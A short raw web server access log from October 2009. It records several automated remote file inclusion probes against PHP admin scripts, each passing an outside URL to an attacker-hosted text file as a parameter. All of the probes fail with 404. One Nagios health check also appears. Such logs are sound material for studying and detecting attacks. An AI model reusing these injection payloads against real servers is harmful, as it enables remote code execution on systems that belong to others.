83.138.48.14 - - [06/Oct/2009:02:31:59 -0400] "GET /nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:31:59 -0400] "GET /logs/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:32:04 -0400] "GET /logs/access_log.Q109063000%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:32:07 -0400] "GET /logs/access_log.Q109083100%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
61.135.134.215 - - [06/Oct/2009:02:32:16 -0400] "GET /logs/access_log.Q109083100%20%20/admin/editeur/spaw_control.class.php?spaw_root=http://www.marcalanfreedman.com///old_blog/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:02:32:20 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
83.138.48.14 - - [06/Oct/2009:02:33:08 -0400] "GET /logs/access_log.Q109091100%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
83.138.48.14 - - [06/Oct/2009:02:33:08 -0400] "GET /logs/access_log.Q109052600%20%20/nuseo/admin/nuseo_admin_d.php?nuseo_dir=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.62.196.11 - - [06/Oct/2009:02:33:15 -0400] "GET /logs/access_log.Q109052300%20%20/index1.php?site=http://www.sportmedia.hu/diaksport/nucleus/nucleus/images/feel/fx29id.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
